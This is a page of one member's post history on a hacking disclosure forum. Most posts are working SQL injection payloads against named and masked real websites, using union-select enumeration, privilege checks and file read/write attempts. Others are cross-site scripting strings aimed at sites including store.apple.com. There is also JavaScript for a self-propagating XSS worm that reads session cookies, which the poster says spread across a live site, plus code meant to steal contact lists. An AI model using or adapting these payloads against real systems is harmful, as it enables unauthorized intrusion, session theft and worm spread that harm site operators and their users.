Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 36
5 years ago
Jiu
"memberid=42 and 1=1-- -&page=1" and "member_id=42 and (select 0x42)>0x41-- -&page=1" doesn't work :S Did you want a mp with the whole url? So Union is in a blackList certainly ^^
Forum: SQL and Code Injection
5 years ago
Jiu
Wow, that was fast :D but if "/*" must be closed, why that works with "group by" and "#" doesn't work?
Forum: SQL and Code Injection
5 years ago
Jiu
So I have the site: http://site.com/page.php?memberid=42&page=1 It's mysql 5 The field memberid is vulnerable to SQL injection: memberid=42 and 1=0 => false memberid=42 and 1=1 => true now the weird thing: memberid=42 and 1=0/* => false memberid=42 and 1=1/* => false memberid=42 and 1=0-- => false memberid=42 and 1=1-- => false memberid=42 and 1=0# =>
Forum: SQL and Code Injection
6 years ago
Jiu
http://store.apple.com/us/search?find=%22%3E%3Cimg%20src=%22.%22%20onerror=%22alert(1)%22%3Cinput without onmouseover ^^ works in Firefox 2
Forum: Full Disclosure
6 years ago
Jiu
"style="-moz-binding:url('//ha.ckers.org/xssmoz.xml%23xss'); Seems that no more works on FF2 :( "style="-moz-binding:url(data:text/xml;charset=utf-7,%2bADw-?xml version='1.0'?%2bAD4APA-bindings xmlns='http://www.mozilla.org/xbl'%2bAD4APA-binding%20id='xss'%2bAD4APA-implementation%2bAD4APA-constructor%2bAD4-alert('XSS');%2bAPA-/constructor%2bAD4APA-/implementation%2bAD4APA-
Forum: Full Disclosure
6 years ago
Jiu
m4x Wrote: ------------------------------------------------------- > I recently found an SQL injection vulnerability on > a site named neopets.com.. > > I have been able to get some output but in a > different kind of way...heres what i have - > > http://www.neopets.com/s/index.phtml?track_cat_id= > -1%20union%20select%201,@@version,3,4,5,6,7&item_i > d=
Forum: SQL and Code Injection
6 years ago
Jiu
You must just try possibility, "union select 1,2,3,4,5,6,7 from table_name" If the neopets appair, that's a good table, else its not Use your imagination for the tablename ;) Jiu
Forum: SQL and Code Injection
6 years ago
Jiu
Think its better to use that 8-) http://www.neopets.com/s/index.phtml?track_cat_id=9%20union%20select%201,2,3,4,5,6,7&item_id=346&track_start_point_id=129 If injection is correct, the neopets appair else not ^^ But it's mysql 4.x.xx :/ Must bruteforce tablename xD Jiu
Forum: XSS Info
6 years ago
Jiu
Hi I find a vulnerability in ebuddy.com. You can send javascript in img or iframe, but you must encode the code. <img src=. onerror="alert('xss');"> wont work but if you send %3cimg src=. onerror=%27alert(%22xss%22);%27%3e, the javascript will execute http://img442.imageshack.us/my.php?image=proof3go4.jpg So i just wrote that to steal the contact list if(window.XMLHt
Forum: Full Disclosure
6 years ago
Jiu
http://badoo.com var x; b=Math.floor(Math.random()*1000000); if(window.XMLHttpRequest) x = new XMLHttpRequest(); else if(window.ActiveXObject) x = new ActiveXObject("Microsoft.XMLHTTP"); u=document.location; //url l=document.cookie.split(";"); c=l[2].substring(4,36); //cookie p=document.links[6].href; //page t=(document.links[6].href).split(".");
Forum: XSS Info
6 years ago
Jiu
I put this w0rm on the domain (Can i say the site?) i has 1142 friends but a lot wasn't accepted by me (you cant see how many friend request you have -_-) The account was deleted, but that was a fast repanding w0rm (~1.5day) and he always doesnt work on IE ^^
Forum: XSS Info
6 years ago
Jiu
Hi, i just create a w0rm for a domain, but he doesnt work in IE... var x; b=Math.floor(Math.random()*1000000); if(window.XMLHttpRequest) x = new XMLHttpRequest(); else if(window.ActiveXObject) x = new ActiveXObject("Microsoft.XMLHTTP"); u=document.location; l=document.cookie.split(";"); c=l[2].substring(4,36); p=document.links[6].href; t=(document.links[6].hr
Forum: XSS Info
6 years ago
Jiu
ch.tillate.com (dunno if that works on other country) send message Title: ')" onmouseover=alert(1); o Works on firefox, didn't try on IE ^^
Forum: Full Disclosure
6 years ago
Jiu
Thx for your response ^^ @sirdarcat: Yeah IE sucks, but a lot of people use it :/ @gareth: Seems that doesnt works correctly :/ When i have éééàààèèè, i obtain -> ÿfdÿfdÿfdÿfdÿfdÿfdÿfdÿfdÿfd, but it certainly how i receive the informations... When i alert that i receive, that put a "?" for all non ascii charactere... ^^ and when i escape that that give me for
Forum: XSS Info
6 years ago
Jiu
Hi all, i just create a w0rm for a little website. I've just a little problem with those caractere (é,à,è,...). If there is one of these caracteres in the "hobbies" or in "me", the POST doesnt works. Normally, with escape, that's will works, no? Here is the code (its my first w0rm, surely a lot of error =D) var x; var temp; var temp2; if(window.XMLHttpRequest) // F
Forum: XSS Info
6 years ago
Jiu
Same question ^^ Can you inject some code in an error like that: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-5,5' at line 1 When you change the numbre of the &page="a negative number" , that change the "-5" in the sql error ^^ thx Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
No output :S i retry that SELECT null,null,is_grantable,null FROM information_schema.user_privileges WHERE privilege_type = CONCAT(Char(102),Char(105),Char(108),Char(101)) LIMIT 1 But always no output :S dunno why xD Perhaps you cant use concat with 'file', must use quote ^^' Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
As you say i try that: hxxp://www.***.com/***.php?id=24 and 1=0 UNION SELECT null,null,is_grantable,null FROM information_schema.user_privileges WHERE privilege_type = CONCAT(Char(102),Char(105),Char(108),Char(101)) But nothing appair (i try with limit 1 too) so perhaps it normal.. i try hxxp://www.***.com/***.php?id=24 and 1=0 UNION SELECT null,null,is_grantable,null FROM information_
Forum: SQL and Code Injection
7 years ago
Jiu
Yes its that i try xD Just copy false ^^ And that give me: NO ^^
Forum: SQL and Code Injection
7 years ago
Jiu
hxxp://www.***.com/***.php?id=24 and 1=0 UNION SELECT null,null,grantee,null FROM information_schema.user_privileges LIMIT 1 that give me 3 output 'username'@'%' then i do hxxp://www.***.com/***.php?id=24 and 1=0 UNION SELECT null,null,is_grandable,null FROM information_schema.user_privileges LIMIT 1 response: NO XD So i think that no say that i havent file privilege ^^' All that i
Forum: SQL and Code Injection
7 years ago
Jiu
hxxp://www.***.com/***.php?id=24 and 1=0 UNION SELECT null,grantee,is_grantable,null FROM information_schema.user_privileges WHERE privilege_type = CONCAT(Char(102),Char(105),Char(108),Char(101)) AND grantee like CONCAT(Char(102),Char(114),Char(111),Char(110),Char(116),Char(110),Char(97),Char(116),Char(102),Char(110)) response doesnt appair at the place where there is normally the informations
Forum: SQL and Code Injection
7 years ago
Jiu
So how can i know if i have file privilege? ^^ Your article are nice and learn good how to inject code ^^ Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
hxxp://www.xxx.com/xxx.php?id=24 and 1=0 union select null,null,file_priv,null FROM mysql.user WHERE user = CONCAT(Char(),Char(),...)-- (The username of server in the CONCAT) I obtain: SELECT command denied to user 'username'@'server' for table 'user' so i think that i dont have file privilege? :( Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
Ok i try that hxxp://www.***.com/***.php?id=24 and 1=0 union select null,null,load_file(CONCAT(/../../../../file.txt)),null-- seems that doesnt work (perhaps wrong syntax)(doesnt display anything) and when i try hxxp://www.***.com/***.php?id=24 and 1=0 union select * from accueil into outfile(CONCAT(hxxp://mysite.com/file.txt)) that do: You have an error in your SQL syntax; check
Forum: SQL and Code Injection
7 years ago
Jiu
So When i have table and column, what i can do? There is no user table and no password ^^' And like you said, i cant update :p Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
In java, when you cast a char with int, that give you the number of the char ^^ So that wokrs (i obtain same result that mario) :) And to simplify thing i do that import java.util.Scanner; public class test { private static Scanner scanner = new Scanner(System.in); public static void main(String[] args) { System.out.print("Enter a String: "); String t = scanner.next
Forum: SQL and Code Injection
7 years ago
Jiu
Think it doesnt work or i dont use it correctly I just create this javacode ^^ import java.util.Scanner; public class test { private static Scanner scanner = new Scanner(System.in); public static void main(String[] args) { System.out.print("Enter a String: "); String t = scanner.next(); char [] ch = t.toCharArray(); for(int i=0;i<ch.length;i++){ System.out
Forum: SQL and Code Injection
7 years ago
Jiu
Ok thx, that works ^^ hxxp://www.***.com/***.php?id=24 and 0=1 union select null,null,column_name,null from information_schema.columns where table_name = CONCAT(Char(97),Char(99),Char(99),Char(117),Char(101),Char(105),Char(108)) Limit 0,1 I obtain the column from the table "accueil" :) Now if you have a website who convert a String in a sequence of Char(), i take :p Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
Yeah i know for the tablename, just say that because i have try with a lot of table... But I dont have access to quote and double quote and without quote, that give me Unknown column 'thetablename' in 'where clause' So i ask you if i can use concat ? ^^ Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
To find table and column i do what do you say: hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,table_name,444 FROM information_schema.tables LIMIT 1,1 the table_name was in the title and i just change the limit like LIMIT 2,1 => LIMIT 3,1 (i begin at 15, because the first table are already define by MySQL) Same for column but with hxxp://www.***.com/***.php?id=24 AND 1=0 U
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2